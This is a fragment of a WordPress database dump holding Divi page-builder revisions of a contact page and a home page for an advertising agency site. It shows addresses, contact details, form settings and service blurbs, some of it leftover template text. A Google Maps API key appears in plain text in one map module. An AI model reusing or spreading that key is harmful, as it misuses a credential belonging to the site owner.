5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map google_api_key=\"AIzaSyAdnWMyhH9MNLMG_ej6wNpMPsbnpXzDomw\" address=\"B-53/2, Naraina Vihar, New Delhi - 110028, India\" address_lat=\"37.8043637\" address_lng=\"-122.2711137\" mouse_wheel=\"off\" use_grayscale_filter=\"on\" grayscale_filter_amount=\"70\" _builder_version=\"4.5.2\" child_filter_saturate=\"30%\" hover_enabled=\"0\"][et_pb_map_pin pin_address=\"B-53/2, Naraina Vihar, New Delhi - 110028, India\" pin_address_lat=\"37.8043637\" pin_address_lng=\"-122.2711137\" _builder_version=\"4.5.2\" hover_enabled=\"0\"][/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 19:17:34','2020-08-08 19:17:34','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(685,1,'2020-08-08 19:23:24','2020-08-08 19:23:24','[et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>COntact US</h1>[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Section\" _builder_version=\"3.22\" custom_padding=\"50px||50px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" admin_label=\"Contact Area\" _builder_version=\"3.25\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\"]<h4>Delhi</h4>\n<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:dhiraj@wthtest1.in8.cdn-alpha.com\">dhiraj@wthtest1.in8.cdn-alpha.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Bangalore</h4>\n<p>22 East 41/B Street,<br /> San Francisco, CA 30401, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoSF@designagency.com</a></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" link_font=\"||||on|||#fcd21d|double\" link_text_color=\"#353740\" header_font=\"Montserrat||||\" header_4_font=\"Montserrat|700|||||||\" header_4_text_color=\"#353740\" header_4_font_size=\"22px\" header_4_line_height=\"1.9em\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" locked=\"off\"]<h4>Singapore</h4>\n<p>22 East 41/B Street,<br /> New York, NY 98765, USA</p>\n<p>+22 1234 5678 5411</p>\n<p><a href=\"mailto:info@designagency.com\">infoNY@designagency.com</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Map Section\" _builder_version=\"3.22\"][et_pb_fullwidth_map _builder_version=\"4.5.2\" _module_preset=\"default\" address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" hover_enabled=\"0\"][et_pb_map_pin _builder_version=\"4.5.2\" _module_preset=\"default\" title=\"WhatTheHell?\" pin_address=\"B-53/2, Naraina Vihar, New Delhi-110028, India\" hover_enabled=\"0\"]<p>B-53/2, Naraina Vihar, New Delhi - 110028, India</p>\n[/et_pb_map_pin][/et_pb_fullwidth_map][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_direction=\"bottom\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Get in touch.</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','CONTACT','','inherit','closed','closed','','401-revision-v1','','','2020-08-08 19:23:24','2020-08-08 19:23:24','',401,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/401-revision-v1/',0,'revision','',0),(687,1,'2020-08-08 19:41:47','2020-08-08 19:41:47','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" 